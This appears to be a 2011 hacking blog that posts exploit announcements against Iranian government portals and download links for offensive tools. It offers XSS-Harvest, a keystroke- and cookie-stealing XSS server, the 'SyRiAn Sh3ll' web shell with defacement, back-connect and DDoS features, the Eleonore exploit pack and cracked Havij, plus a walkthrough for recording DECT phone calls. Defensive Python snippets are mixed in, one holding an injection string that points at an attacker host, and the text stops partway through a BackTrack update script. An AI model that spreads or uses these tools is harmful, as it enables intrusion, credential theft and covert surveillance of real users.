Sunday, October 23, 2011

turbo pascal 7

download link

http://www.mediafire.com/?27h4qj7mprs35zj

contact me : erfan.omidfar@yahoo.com

Sunday, July 10, 2011

Paliz Portal Multiple Vulnerabilities.

Exploit Title : Paliz Portal Multiple Vulnerabilities
Author : K0242 / TBH
Contact : l3lackhat [at] yahoo [dot] com , l3lackhat.ir [at] gmail [dot] com
webC : www.K0242.gigfa.com
Portal Link : www.palizct.com
Tested ON : All ver 0f Paliz Portal
Security Risk : Medium
Description : All target's iranian GOVerment websites
.
.
.
m0re inf0 :

http://www.k0242.gigfa.com/xpl/PalizPortal.txt

Saturday, July 9, 2011

CVE-2011-0611 Adobe Flash Zero Day embeded in DOC

root@bt:~# flasm -d 1.swf
movie '1.swf' // flash 10, total frames: 1, frame rate: 24 fps, 550x400 px
frame 0
00000000    push FALSE, 326943637, 326943739
0000000F    oldEquals
00000010    not
00000011    branchIfTrue label2 // offset 1100
00000016    branchIfTrue label1 // offset 24
0000001B    constants 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I'  Declared constant pool length 21 differs from calculated length 20
---

The crash exists in the Adobe Flash Player plugin.
In my test, NPSWF32.dll (10.2.153.1) crashed at location 100cfc03.

Code: http://pastebin.com/DkQThUUY
You can find more info at:
http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html
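As an added example (not from the original post), a small Python scanner that finds SWF objects embedded in another file such as a .doc container and parses their headers, the triage step for a document carrying a Flash object like the one above; the OLE2 signature and the 550x400 / 24 fps sample movie are constructed inline.

```python
import struct
import zlib

# SWF signatures: FWS = uncompressed, CWS = zlib-packed body, ZWS = LZMA-packed body.
SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")


def build_rect(xmin, xmax, ymin, ymax, nbits=15):
    """Encode an SWF RECT (twips, 20 per pixel); only used to build the sample below."""
    bits, total = nbits, 5
    for v in (xmin, xmax, ymin, ymax):
        bits = (bits << nbits) | (v & ((1 << nbits) - 1))
        total += nbits
    pad = (-total) % 8
    return (bits << pad).to_bytes((total + pad) // 8, "big")


def parse_rect(data):
    """Decode an SWF RECT; returns (xmin, xmax, ymin, ymax, bytes_consumed)."""
    nbits = data[0] >> 3                       # first 5 bits: width of each field
    total = 5 + 4 * nbits
    nbytes = (total + 7) // 8
    bits = int.from_bytes(data[:nbytes], "big") >> (nbytes * 8 - total)
    mask = (1 << nbits) - 1
    vals = [(bits >> ((3 - i) * nbits)) & mask for i in range(4)]
    vals = [v - (1 << nbits) if v >> (nbits - 1) else v for v in vals]  # sign-extend
    return (*vals, nbytes)


def parse_swf_header(blob, off):
    """Parse the SWF header at blob[off:]; None if it is not a plausible SWF."""
    sig = blob[off:off + 3]
    if sig not in SWF_MAGICS or off + 8 > len(blob):
        return None
    version = blob[off + 3]
    declared = struct.unpack_from("<I", blob, off + 4)[0]  # uncompressed total size
    if not 1 <= version <= 50 or declared < 21:            # 21: smallest sane movie
        return None
    info = {"offset": off, "signature": sig.decode(), "version": version,
            "declared_length": declared, "available": len(blob) - off}
    body = blob[off + 8:]
    if sig == b"CWS":
        try:
            body = zlib.decompressobj().decompress(body)
        except zlib.error:
            return None
    elif sig == b"ZWS":
        return info                                        # LZMA body: header only
    if len(body) < 13:
        return None
    xmin, xmax, ymin, ymax, n = parse_rect(body)
    info["size_px"] = ((xmax - xmin) // 20, (ymax - ymin) // 20)
    info["frame_rate"] = struct.unpack_from("<H", body, n)[0] / 256.0  # 8.8 fixed
    info["frame_count"] = struct.unpack_from("<H", body, n + 2)[0]
    # A declared size larger than the bytes that follow means a truncated or
    # deliberately inconsistent object, the same kind of mismatch flasm warned about.
    info["truncated"] = sig == b"FWS" and declared > info["available"]
    return info


def find_embedded_swf(blob):
    """Scan any file (for example a .doc container) for embedded SWF objects."""
    hits = []
    for magic in SWF_MAGICS:
        pos = blob.find(magic)
        while pos != -1:
            info = parse_swf_header(blob, pos)
            if info:
                hits.append(info)
            pos = blob.find(magic, pos + 1)
    return sorted(hits, key=lambda h: h["offset"])


# Constructed sample: an OLE2 (.doc) signature, then a minimal 550x400 / 24 fps /
# one-frame movie (the dimensions flasm printed above), once plain and once zlib-packed.
_body = build_rect(0, 550 * 20, 0, 400 * 20) + b"\x00\x18" + b"\x01\x00" + b"\x40\x00\x00\x00"
_fws = b"FWS" + bytes([10]) + struct.pack("<I", 8 + len(_body)) + _body
_cws = b"CWS" + bytes([10]) + struct.pack("<I", 8 + len(_body)) + zlib.compress(_body)
SAMPLE_DOC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64 + _fws + b"\x00" * 32 + _cws

if __name__ == "__main__":
    for hit in find_embedded_swf(SAMPLE_DOC):
        print(hit)
```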
 

Friday, July 8, 2011

Harvesting Cross Site Scripting ~> XSS

To demonstrate the real business impact of cross site scripting I have developed a completely new tool from the ground up: XSS-Harvest. It is a multi-threaded, pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool. Before going into the detail, I'll list the high-level functionality below:

Quote:
* Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
* Any key entered will be sent covertly to the server.
* Any mouse click performed will be analysed and the data covertly sent to the server.
* Optionally 'redress' the vulnerable page to display a different page on the same subdomain - e.g. a login form.
* If redressing the victim's browser, allow subsequently loaded pages to be also 'infected' - assuming they don't break the same-origin policy (i.e. they're on the same subdomain).
* Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
* Each victim has a separate history file containing all events, cookies and keystrokes.
* Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as '.' characters to avoid confusion).
* Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
* Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.


How to Exploit XSS with XSS-Harvest:

Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.

Insert the following 'injection string' into the vulnerable page:

This will return the client-side JavaScript to the victim, indicated by the 'i' in the URL.

Now entice visitors to the infected page (or to follow a link, in the case of reflected XSS).

Watch your victims roll in: a new history file will be created for each new victim.

If you wish to make use of the redress function, start the server with the -r parameter:


./xss-harvest.pl -l -r http://vulnerablepage.local/login.html


Any incoming victim will now be redirected to the specified page by means of a full window IFRAME overlaid on top of the original vulnerable page. Some screenshots of the server in action are shown below:

image :

http://4.bp.blogspot.com/-LUMEeMiuYiA/ThWcsc5_czI/AAAAAAAA0dI/iuaDTvTcNPY/s640/Screenshot-user%2540computer%253A+%257E-Desktop-xss-harvest.png

Server console showing incoming victims

http://3.bp.blogspot.com/-825esi4AZzY/ThWe5xXLZ4I/AAAAAAAA0dM/TYvrXGPfW4w/s400/Screenshot-d018996d89c997cbcbb00c6913544c91.txt+%2528%257E-Desktop-xss-harvest-history%2529+-+gedit.png

Received events, clicks and keystrokes

Description
Usage:
./xss-harvest.pl -l [-p Port] [-r Redress the victims browser]

Start with (-l) and point your victims at http:///i to be "infected".
e.g. inject something like this into a vulnerable page -

Optionally run ./xss-harvest.pl with the (-r) parameter to redress the victims browser to a different page on the same site (such as a login form) after successful infection.
e.g. ./xss-harvest.pl -l -r http:///login.php

For persistent XSS (infection persists across subsequent pages on the same domain), you must use the redress feature, even if you intend to display the original vulnerable page.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.


Download :
https://docs.google.com/leaf?id=0B-yhjV3y1-D2ZmVlMmUxMWUtNjJhYy00Njc5LWI0M2ItZTMwMmIxMTQ0NTNh&hl=en_GB


All feedback would be most welcome: please share improvements and distribute under the GPL license.

Requires the following dependencies:

HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std, Net::Server::PreFork
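From the defender's side, an added example (not part of XSS-Harvest or the original post): the reflecting sink the tool needs beside a hardened version with context-aware encoding, plus the response headers and cookie attributes that take away what the harvester relies on; the injection string and its host are constructed placeholders.

```python
import html
import json
import secrets
from urllib.parse import quote

# Constructed injection string of the kind the post describes: a script tag that pulls
# the harvester's client-side code from a host the attacker controls (placeholder host).
INJECTION = '<script src="http://attacker.example/i"></script>'


def render_search_vulnerable(query):
    """Reflects the parameter straight into the page: exactly the sink XSS-Harvest needs."""
    return "<h1>Results for: " + query + "</h1>"


def render_search_hardened(query, nonce):
    """Context-aware output encoding: each sink gets the escaping its context requires."""
    text_ctx = html.escape(query)                        # HTML text and quoted attributes
    js_ctx = json.dumps(query).replace("<", "\\u003c")   # JS string literal; no </script>
    url_ctx = quote(query, safe="")                      # URL query component
    return (
        f"<h1>Results for: {text_ctx}</h1>\n"
        f'<input type="search" value="{text_ctx}">\n'
        f'<script nonce="{nonce}">var lastQuery = {js_ctx};</script>\n'
        f'<a href="/search?q={url_ctx}">permalink</a>'
    )


def security_headers(nonce):
    """Headers that remove what the harvester relies on even if an encoding slip remains:
    only script carrying this response's nonce runs (an injected <script src> has none),
    every fetch, XHR or image/script load is confined to this origin (the exfiltration
    channel), and the page cannot be framed at all, so the 'redress' overlay cannot
    embed the login form, same origin or not."""
    return {
        "Content-Security-Policy": f"default-src 'self'; script-src 'nonce-{nonce}'; "
                                   "connect-src 'self'; frame-ancestors 'none'; "
                                   "form-action 'self'",
        "X-Content-Type-Options": "nosniff",
    }


def session_cookie_header(name, value):
    """HttpOnly keeps the session cookie out of document.cookie, so script cannot read it."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


def contains_raw_script_tag(rendered):
    """True when an unescaped '<script src=' survived into the output."""
    return "<script src=" in rendered.lower()


def new_nonce():
    """One fresh, unguessable nonce per response."""
    return secrets.token_urlsafe(16)


if __name__ == "__main__":
    n = new_nonce()
    print(render_search_vulnerable(INJECTION))
    print(render_search_hardened(INJECTION, n))
    print(security_headers(n))
```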


DOURAN Portal Full Ver Multiple Vulnerabilities.

Exploit Title : DOURAN Portal Full Ver Multiple Vulnerabilities
Author : K0242
Contact : l3lackhat [at] yahoo [dot] com , l3lackhat.ir [at] gmail [dot] com
Portal Link : www.DOURAN.com
Tested ON : All ver 0f Douran Portal
Security Risk : High
Description : All target's iranian GOVerment websites
.
.
.
Read more :

www.k0242.gigfa.com/xpl/DouranPortal.txt

SyRiAn Sh3ll V7

# SyRiAn Sh3ll V7 Priva8.
# Copyright (C) 2011 - SyRiAn 34G13
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .

* Features;
- Mass Defacement Script
- Zone-H Defacer Adder
- Forum Defacer
- PHP Bypasser
- FTP Brute Forcer
- Admin Control Panel Finder
- Encryption
- Back Connection
- Bind Connection
- Eval
- Safe Mode Bypass
- Open_Basedir Bypass
- SQL manager
- 100% Undetected
- DDoS Attack
& more...

Download :

http://www.k0242.gigfa.com/t00L/SyRiAn.Sh3ll.V7.txt

Enj0y it ;)

Wednesday, July 6, 2011

DECT Sniffing Dedected~RECORD PHONE CONVERSATIONS

This is a detailed guided video tutorial on how to install and use the dedected.org DECT sniffing tools, record phone calls, decode them and listen to them. All of this is done with a vanilla BackTrack 5 KDE x86.

Back-Track-Wiki:

backtrack-linux.org/wiki/index.php/DECT_Sniffing_Dedected


Contents
1 What is DECT?
1.1 The problem?
1.2 Tested on
2 Installing dedected
2.1 Install from repository
2.2 Install from source
3 Install some additional tools
4 Load the drivers
5 Scan for fixed parts a.k.a. fp (DECT base stations)
6 Ignore phones you don’t want to sniff (e.g. your neighbours!)
7 Record the phone call
8 Decode the call out of the datastream
9 Import the streams into audacity and listen to the calls
10 Clean up / Reload
11 DECT protocol
12 Video: Sniffing DECT phones with BackTrack 5

# What is DECT?


http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications

# The problem?
Most vendors don't implement encryption in their devices, so one can sniff the traffic with certain hardware and software.

Tested on

BackTrack 5 final x86 KDE with kernel 2.6.38
Original Dosch&Amand Type II PCMCIA Card
SIEMENS C1 DECT Phones set up in repeater mode

NOTE: This is experimental software which is not very actively supported anymore!

Installing dedected

To get dedected installed on BackTrack you have two choices:

Use dedected from the BackTrack 5 repositories.
Compile it yourself if you want to experiment.

Install from repository


root@bt:~# apt-get update
root@bt:~# apt-get install dedected

Install from source

This stage is optional for those wanting to build the tools from source code.


root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/
root@bt:~# cd /pentest/telephony
root@bt:~# svn co https://dedected.org/svn/trunk dedected_svn
root@bt:~# cd dedected_svn/com-on-air_cs-linux/
root@bt:~# make && make -C tools

Install some additional tools


root@bt:~# apt-get -y install audacity

Load the drivers


root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make node

If you have not yet inserted your Dosch&Amand Type 2 or Type 3 or Voo:doo PCMCIA card, do so now! Next, we load the driver:


root@bt:~# make load

Scan for fixed parts a.k.a. fp (DECT base stations)


root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux/tools
root@bt:~# ./dect_cli

If you need information on usage, type "help". If you live in the U.S., switch to the US/DECT 6 band via the "band" command. Let's enable some verbosity:


verb

And start scanning for base stations:


fpscan

After scanning through all channels 2-3 times, disable verbosity and stop scanning:


verb
stop

image :
http://www.backtrack-linux.org/wiki/images/8/80/DECT-BT5-Image02.png

Ignore phones you don’t want to sniff (e.g. your neighbours!)

Start a callscan:


callscan

Now grab your DECT handset, make a test phone call and wait until you see the call appear. It is also sufficient if you just get a dialling tone. You should see something like:


### found new call on 00 82 31 33 73 on channel 7 RSSI 34

Then stop the scan:


stop

Name your base station if you want:


name 00 82 31 33 73 stallowned

Dump all found phones:


dump

Ignore every other phone except yours via the following command! IMPORTANT!!!


ignore 01 30 95 13 37

Record the phone call

Start automatic recording of every phone call it detects:


autorec
Now grab your DECT handset and make a test call. I recommend calling a "time telling service" that can be reached on a normal phone number. You should get something like this:


### starting autorec
### stopping DIP
### starting callscan
### trying to sync on 00 82 ab b0 29
### got sync
### dumping to dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap
### stopping DIP
After you hang up the call, the dumping should stop:

image :

http://www.backtrack-linux.org/wiki/images/0/0c/DECT-BT5-Image04.png

Decode the call out of the datastream

Stop the autorec:


stop

Decode the audiostream out of the raw dump


root@bt:~# ./decode.sh

image :

http://www.backtrack-linux.org/wiki/images/5/57/DECT-BT5-Image01.png

Import the streams into audacity and listen to the calls

Start Audacity via "alt + f2", then type "audacity" and press enter. Import the fixed-part and the portable-part .wav files from /pentest/telephony/dedected/com-on-air_cs-linux/tools via File -> Import -> Audio, or simply "ctrl + shift + I". Import the files which end in .pcap_fp.ima.g721.wav and .pcap_pp.ima.g721.wav.

Play your phone call with the play button:

image :

http://www.backtrack-linux.org/wiki/images/6/64/DECT-BT5-Image00.png

Hint: if you can only hear noise, your phone seems to use some encoding/encryption. You can enable repeater mode in your telephone, which disables encryption, to test whether your setup is working properly.

Clean up / Reload

If you need to reload the drivers


root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make reload

If you’re finished and want to clean up:


root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make unload
root@bt:~# rm /dev/coa
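An added example, not from the wiki or the tool: a small audit over the dect_cli output and the dump filenames shown above that lists every station the card saw, produces the `ignore` lines for everything that is not your own base station, and flags any recording whose RFPI is not on your owned list. The session and filenames are constructed samples; the RFPI values reuse the ones quoted above.

```python
import re

# Line shapes taken from the dect_cli / autorec output quoted in the walkthrough above.
CALL_RE = re.compile(r"### found new call on ((?:[0-9a-f]{2} ){4}[0-9a-f]{2}) on channel (\d+) RSSI (\d+)", re.I)
SYNC_RE = re.compile(r"### trying to sync on ((?:[0-9a-f]{2} ){4}[0-9a-f]{2})", re.I)
DUMP_RE = re.compile(r"dump_\d{4}-\d{2}-\d{2}_\d{2}_\d{2}_\d{2}_RFPI_([0-9a-f]{2}(?:_[0-9a-f]{2}){4})\.pcap", re.I)


def norm_rfpi(s):
    """Normalise an RFPI written with spaces, underscores or colons to 'xx xx xx xx xx'."""
    return " ".join(re.split(r"[ _:]+", s.strip().lower()))


def parse_cli_log(lines):
    """Every RFPI the tool reported: callscan hits as (call, channel, RSSI), sync attempts as (sync, None, None)."""
    seen = {}
    for line in lines:
        m = CALL_RE.search(line)
        if m:
            seen.setdefault(norm_rfpi(m.group(1)), []).append(("call", int(m.group(2)), int(m.group(3))))
            continue
        m = SYNC_RE.search(line)
        if m:
            seen.setdefault(norm_rfpi(m.group(1)), []).append(("sync", None, None))
    return seen


def ignore_commands(seen, owned):
    """The `ignore` lines the walkthrough marks IMPORTANT: every station that is not yours."""
    own = {norm_rfpi(r) for r in owned}
    return [f"ignore {r}" for r in sorted(seen) if r not in own]


def audit_dumps(filenames, owned):
    """Recordings whose RFPI is not in the owned list: these should not exist and must be deleted."""
    own = {norm_rfpi(r) for r in owned}
    bad = []
    for name in filenames:
        m = DUMP_RE.search(name)
        if m and norm_rfpi(m.group(1)) not in own:
            bad.append(name)
    return bad


# Constructed sample session: the walkthrough's own station plus two others in range.
SAMPLE_LOG = """\
### found new call on 00 82 31 33 73 on channel 7 RSSI 34
### found new call on 01 30 95 13 37 on channel 3 RSSI 12
### starting autorec
### trying to sync on 00 82 ab b0 29
### got sync
### dumping to dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap
""".splitlines()
OWNED = ["00 82 31 33 73"]
SAMPLE_DUMPS = ["dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap",
                "dump_2011-06-11_21_40_02_RFPI_00_82_31_33_73.pcap"]

if __name__ == "__main__":
    seen = parse_cli_log(SAMPLE_LOG)
    print("\n".join(ignore_commands(seen, OWNED)))
    print("recordings of stations you do not own:", audit_dumps(SAMPLE_DUMPS, OWNED))
```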

DECT protocol

If you are interested in more details of the protocol you can open the .pcap file in Wireshark:

image :

http://www.backtrack-linux.org/wiki/images/e/e3/DECT-BT5-Image03.png

Video: Sniffing DECT phones with BackTrack 5 :


http://vimeo.com/25027253

A sniff log and a PDF with much more information can be found here:


offensive-security.com/backtrack/sniffing-dect-phones/

Thanks to 5m7x, dedected (https://dedected.org/trac) is soon to be added to the BackTrack repositories. In our internal tests, the standard AT&T cordless phone was found not to use encryption. The recording quality was phenomenal; you can find a copy of this recording here:

http://www.offensive-security.com/downloads/sniff-dect.mp3

offensive-security.com/backtrack/sniffing-dect-phones-the-details/

5M7X has completed his DECT write-up, and it rocks. As DECT phone manufacturers rarely give any indication about their phones' encryption capabilities, the only reliable way to check the security of your phone is to test it yourself.

The paper goes into detail about the underlying technology, hardware and software needed to test your own phone and assess its security.
---------------------------------------------------
Download Sniffing DECT Phones for phun and prophit:

http://www.offensive-security.com/downloads/sniffing-dect-phones-for-fun-and-profit.pdf

Check out the accompanying Video. Dedected will be pushed into the BT repo in a couple of days.

Video :

http://www.youtube.com/v/vAZLZ8dMIL0&hl=en_US&feature=player_embedded&version=3

# This article was contributed by 5M7X and collected by K0242.

Eleonore Exploit Pack 1.4.4

Included (old version):
> MDAC
> MS009-02
> DX DirectShow
> ActiveX pack
> compareTo
> JNO (JS navigator Object Code)
> MS06-006
> Font tags
> Telnet
> PDF collab.getIcon
> PDF Util.Printf
> PDF collab.collectEmailInfo
> Java D&E
> Soc pack (iframe ver)

download link : http://www.mediafire.com/?h2tpfg2w9o9mgdv

download havij 1.14 pro (cracked)

just for fun

download : http://www.4shared.com/file/parzQWMa/havijtar_2.html

Windbg Script for Kernelcallbacks under x86 Architecture

$$ x86 Kernel Callback Finder for CreateProcess/LoadImage/CreateThread/Registry
$$ Frank Boldewin / www.reconstructer.org
$$
$$ Each array slot holds an EX_FAST_REF: the low 3 bits are a reference count,
$$ so they are masked off (&-8) to reach the EX_CALLBACK_ROUTINE_BLOCK, whose
$$ Function pointer sits at offset 4 on x86 (hence the +4).

.printf "\nCreateProcess Callbacks:\n"
.printf "------------------------\n"

aS CPNAddr  "nt!PspCreateProcessNotifyRoutine";
aS CPNCount "poi(nt!PspCreateProcessNotifyRoutineCount)";
aS Counter  "@$t0";

.block
{
  .for (r ${Counter} = 0; ${Counter} < ${CPNCount}; r ${Counter} = ${Counter} + 1)
  {
    .printf "Callback: %d - Address: 0x%08x\n", ${Counter}+1, poi(((dwo(${CPNAddr} + ${Counter} *4))&-8)+4);
  }
}

.printf "\nLoadImage Callbacks:\n"
.printf "--------------------\n"

aS LINAddr  "nt!PspLoadImageNotifyRoutine";
aS LINCount "poi(nt!PspLoadImageNotifyRoutineCount)";

.block
{
  .for (r ${Counter} = 0; ${Counter} < ${LINCount}; r ${Counter} = ${Counter} + 1)
  {
    .printf "Callback: %d - Address: 0x%08x\n", ${Counter}+1, poi(((dwo(${LINAddr} + ${Counter} *4))&-8)+4);
  }
}

.printf "\nCreateThread Callbacks:\n"
.printf "-----------------------\n"

aS CTNAddr  "nt!PspCreateThreadNotifyRoutine";
aS CTNCount "poi(nt!PspCreateThreadNotifyRoutineCount)";

.block
{
  .for (r ${Counter} = 0; ${Counter} < ${CTNCount}; r ${Counter} = ${Counter} + 1)
  {
    .printf "Callback: %d - Address: 0x%08x\n", ${Counter}+1, poi(((dwo(${CTNAddr} + ${Counter} *4))&-8)+4);
  }
}

.printf "\nRegistry (CMP) Callbacks:\n"
.printf "-------------------------\n"

aS CMNAddr  "nt!CmpCallBackVector";
aS CMNCount "poi(nt!CmpCallBackCount)";

.block
{
  .for (r ${Counter} = 0; ${Counter} < ${CMNCount}; r ${Counter} = ${Counter} + 1)
  {
    .printf "Callback: %d - Address: 0x%08x\n", ${Counter}+1, poi(((dwo(${CMNAddr} + ${Counter} *4))&-8)+4);
  }
}

$$ Release the aliases so the script can be run again in the same session.
ad ${/v:CPNAddr};
ad ${/v:CPNCount};
ad ${/v:LINAddr};
ad ${/v:LINCount};
ad ${/v:CTNAddr};
ad ${/v:CTNCount};
ad ${/v:CMNAddr};
ad ${/v:CMNCount};
ad ${/v:Counter};
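An added triage helper, not part of Frank Boldewin's script: it parses the script's output, resolves each callback address against a module list in the layout `lm` prints (an assumed layout for the sample) and flags routines that no loaded module backs; it also shows what the `&-8` / `+4` expression computes. The sample output and module ranges are constructed.

```python
import re

# Output lines produced by the script above, and module lines in the layout WinDbg's `lm`
# command prints ("start end module"); the latter is an assumed layout for the sample.
CALLBACK_RE = re.compile(r"Callback:\s*(\d+)\s*-\s*Address:\s*0x([0-9a-f]{8})", re.I)
MODULE_RE = re.compile(r"^([0-9a-f]{8})\s+([0-9a-f]{8})\s+(\S+)", re.I)


def decode_fast_ref(value):
    """What the script's `&-8` does: an EX_FAST_REF packs a 3-bit refcount into the low
    bits of the pointer. Returns (EX_CALLBACK_ROUTINE_BLOCK address, refcount); the
    block's Function pointer is then read at offset 4 on x86 (the script's `+4`)."""
    return value & ~7, value & 7


def parse_callbacks(script_output):
    """Group 'Callback: n - Address: 0x...' lines under the section heading above them."""
    result, section = {}, None
    for line in script_output.splitlines():
        if line.strip().endswith("Callbacks:"):
            section = line.strip().rstrip(":")
            result[section] = []
            continue
        m = CALLBACK_RE.search(line)
        if m and section is not None:
            result[section].append(int(m.group(2), 16))
    return result


def parse_modules(lm_output):
    """Return (start, end, name) for each module line."""
    return [(int(m.group(1), 16), int(m.group(2), 16), m.group(3))
            for m in map(MODULE_RE.match, lm_output.splitlines()) if m]


def owner_module(addr, modules):
    for start, end, name in modules:
        if start <= addr < end:
            return name
    return None


def triage(callbacks, modules):
    """One row per callback with its owning module; None means the routine lives in
    memory no loaded driver claims, the classic sign of an injected or hidden module."""
    rows = []
    for section, addrs in callbacks.items():
        for i, addr in enumerate(addrs, 1):
            rows.append({"kind": section, "index": i, "address": addr,
                         "module": owner_module(addr, modules)})
    return rows


def unbacked(rows):
    return [r for r in rows if r["module"] is None]


# Constructed sample: two CreateProcess and one LoadImage callback, plus an `lm` listing.
SAMPLE_SCRIPT_OUTPUT = """\
CreateProcess Callbacks:
------------------------
Callback: 1 - Address: 0x8a4c1020
Callback: 2 - Address: 0x8a7f3b40

LoadImage Callbacks:
--------------------
Callback: 1 - Address: 0xf7a02c10

Registry (CMP) Callbacks:
-------------------------
"""
SAMPLE_LM = """\
start    end        module name
804d7000 806e4000   nt
8a4c0000 8a4f8000   exampledrv
f79f0000 f7a10000   ksecdd
"""

if __name__ == "__main__":
    rows = triage(parse_callbacks(SAMPLE_SCRIPT_OUTPUT), parse_modules(SAMPLE_LM))
    for r in rows:
        print(f"{r['kind']:28} #{r['index']} {r['address']:#010x} -> {r['module'] or 'UNBACKED'}")
```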

update script for back track 5

// This is an update script for BackTrack 5.
// Build with: gcc -o backtrack5_update backtrack5_update.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>             /* usleep() */

#define TIME 500000             /* pause between status messages, in microseconds */

int main(void);                 /* the menus jump back to main(), so declare it up front */

/* All three probes must succeed; if any one fails (for example because nc is
 * not installed) the script reports no connectivity and exits. */
void check_internet(void)
{
    if (system("perl -e 'print qq|GET / HTTP/1.0\n\n|;' | nc www.google.com 80 > /dev/null") != 0
            || system("ping -qc1 www.google.com > /dev/null") != 0
            || system("ping -qc1 www.l.google.com > /dev/null") != 0) {
        system("clear");
        printf(" [>] Checking for internet connectivity please wait!\n");
        usleep(TIME);
        printf(" [>] No Internet connectivity found, exiting. \n");
        exit(1);
    }
    else {
        system("clear");
        printf(" [>] Checking for internet connectivity please wait!\n");
        usleep(TIME);
        printf(" [>] Internet is working!\n");
        printf("\n");
    }
}

void backtrack_update(void)
{
    printf(" [>] Updating and cleaning Backtrack, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("apt-get update && apt-get -y dist-upgrade && apt-get autoremove -y && apt-get -y autoclean") == 0) {
        printf("\n");
        printf(" [>] Backtrack updated and cleaned successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update Backtrack.\n");
        usleep(TIME);
    }
}

void exploit_db(void)
{
    printf(" [>] Updating Exploit-db, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("cd /pentest/exploits/exploitdb/platforms/ && svn up") == 0) {
        printf("\n");
        printf(" [>] Exploit-db updated successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update Exploit-db.\n");
        usleep(TIME);
    }
}

void set(void)
{
    printf(" [>] Updating SET, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("cd /pentest/exploits/set/ && svn up") == 0) {
        printf("\n");
        printf(" [>] SET updated successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update SET.\n");
        usleep(TIME);
    }
}

void warvox(void)
{
    printf(" [>] Updating Warvox, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("cd /pentest/telephony/warvox/ && svn up") == 0) {
        printf("\n");
        printf(" [>] Warvox updated successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update Warvox\n");
        usleep(TIME);
    }
}

void aircrack(void)
{
    printf(" [>] Updating Aircrack-NG and Airodump, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("cd /pentest/wireless/aircrack-ng/ && svn up") == 0) {
        system("cd /pentest/wireless/aircrack-ng/scripts/ && chmod a+x airodump-ng-oui-update && ./airodump-ng-oui-update");
        printf("\n");
        printf(" [>] Aircrack-NG and Airodump updated successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update Aircrack-ng.\n");
        usleep(TIME);
    }
}

void giskismet(void)
{
    printf(" [>] Updating Giskismet, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("cd /pentest/wireless/giskismet/ && svn up") == 0) {
        printf("\n");
        printf(" [>] Giskismet updated successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update Giskismet.\n");
        usleep(TIME);
    }
}

void msf(void)
{
    printf(" [>] Updating Metasploit, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("cd /pentest/exploits/framework3/ && svn up") == 0) {
        printf("\n");
        printf(" [>] Metasploit updated successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update Metasploit.\n");
        usleep(TIME);
    }
}

void nessus(void)
{
    printf(" [>] Updating Nessus plugins, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("cd /opt/nessus/sbin/ && ./nessus-update-plugins") == 0) {
        printf("\n");
        printf(" [>] Nessus plugins updated successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update Nessus.\n");
        usleep(TIME);
    }
}

void w3af(void)
{
    printf(" [>] Updating W3AF, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("cd /pentest/web/w3af/ && svn up") == 0) {
        printf("\n");
        printf(" [>] W3AF updated successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update W3AF.\n");
        usleep(TIME);
    }
}

void nikto(void)
{
    printf(" [>] Updating Nikto, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("cd /pentest/web/nikto/ && ./nikto.pl -update") == 0) {
        printf("\n");
        printf(" [>] Nikto updated successfully!\n");
        usleep(TIME);
    }
